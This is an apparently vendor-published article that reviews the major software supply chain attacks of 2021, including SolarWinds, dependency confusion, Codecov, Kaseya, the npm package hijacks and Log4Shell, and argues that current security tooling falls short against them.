Lessons Learned from 2021 Software Supply Chain Attacks

In 2021, the world woke up to a surge in an attack vector that had been a security risk for many years, one that the security community could no longer neglect: software supply chain attacks. Following the SolarWinds attack in late 2020, software companies of all sizes, across all industries, began facing an increased number of targeted and organized supply chain attacks. This enhanced threat resulted in significant system downtime, monetary loss and reputational damage to businesses worldwide.

When Did Random Attacks Become a Pattern?

Throughout 2021, supply chain attacks were rapidly increasing in number and sophistication.

This represents a notable shift in attackers’ approach, now focusing their efforts on breaching software suppliers. This allows them to leverage paths that are implicitly trusted, yet less secure, and to establish a way to breach many victims with one attack, by proxy.

The high risk of software supply chains is, in part, attributed to the fact that a successful attack may affect a large number of companies that use the breached supplier’s software.

The SolarWinds attack is a good example of the potential damage of supply chain attacks. In this nation-state attack against the networking tools vendor SolarWinds, about 18,000 of its customers were exposed as a consequence of using SolarWinds’ breached software.

As many as 250 of these exposed organizations suffered targeted attacks, including governmental agencies, such as the U.S. Pentagon, and top enterprises, such as Microsoft and FireEye.

A Turning Point for Software Supply Chain Security

The SolarWinds attack is considered one of the largest and most sophisticated supply chain attacks to date and exemplifies the devastating potential of supply chain attacks. It directed attackers’ attention to the software supply chain’s comparatively low security status among organizations and was the trigger for a wave of supply chain attacks that followed. The SolarWinds attack received a lot of media coverage and inspired a global wave of security awareness and improvement initiatives focused on reducing the risk of supply chain attacks.

In February that year, Alex Birsan, an information security consultant and bug-bounty hacker, tested the exposure of enterprises to a supply chain attack technique that uses automated DevOps practices to compromise pipelines. This tactic, known as dependency confusion, results in malicious public libraries being incorporated into projects instead of the trusted private libraries of the same name. Birsan was able to hack into Apple, Microsoft and dozens of other top companies during this experiment, illustrating that even companies that highly prioritize security can fall victim to implicit shortcomings in the software supply chain.

SolarWinds was followed by a similar build-time code-manipulation attack in which attackers penetrated the Codecov product’s software supply chain, manipulating the build process to inject malicious code into its software and using the software update mechanism to distribute the malware to Codecov customers.

Not long after, on May 12, 2021, President Biden’s Executive Order on Improving the Nation’s Cybersecurity was released, emphasizing, for the first time, the need to enhance software supply chain security.

In July, the attack on Kaseya raised awareness of the immediate and downstream effects of supply chain attacks. In this attack, a managed service provider software was used to distribute the REvil ransomware to the managed service provider’s customers, causing significant downtime and revenue loss.

Unfortunately, these examples are not isolated cases, and the number of supply chain attacks has since steadily increased with the most popular approach being software dependency poisoning. In November alone, we saw three attacks against popular npm packages (UA-Parser-JS, COA, and RC), each with millions of downloads per month. This malicious tactic has proven quite effective and further stresses the need for the security community to shift their attention to and address this highly damaging potential attack vector.

The past year’s final incident would come on December 9, when the Log4Shell vulnerability was discovered and forced software vendors into a patching frenzy. Shortly after the discovery, attackers started to exploit this popular package and take advantage of this vulnerability to launch their attacks.

Main Lesson Learned from 2021 Attacks Analysis

Examining the success rate and consequent damage of the many attacks in 2021, one of the most evident details is that current security tools and practices are not adequate for preventing supply chain attacks. Traditional application security testing cannot detect supply chain attacks, which often exploit trusted software artifacts rather than the vulnerabilities targeted by such tools.

Additionally, established Cl/CD and DevOps pipelines rely on implicit permissions to enable rapid commits and deployment, implementing security controls at the end of this process — far too late to preclude malicious activity.

For organizations to stay secure, there is an increasing need for new protective methods and solutions that are built to address the unique characteristics of supply chain attacks.

Supply Chain Attack Vectors Still Waiting for a Solution

The number and impact of the past year’s attacks highlight the fact that application security teams face a new challenge that will require innovative thinking. Most AppSec teams lack the resources, budget and knowledge to sufficiently address the risk of supply chain attacks. This is further complicated by the need for cooperation from development and DevOps teams.

For more insights into software supply chain security trends, explore the full 2021 Software Supply Chain Security Report.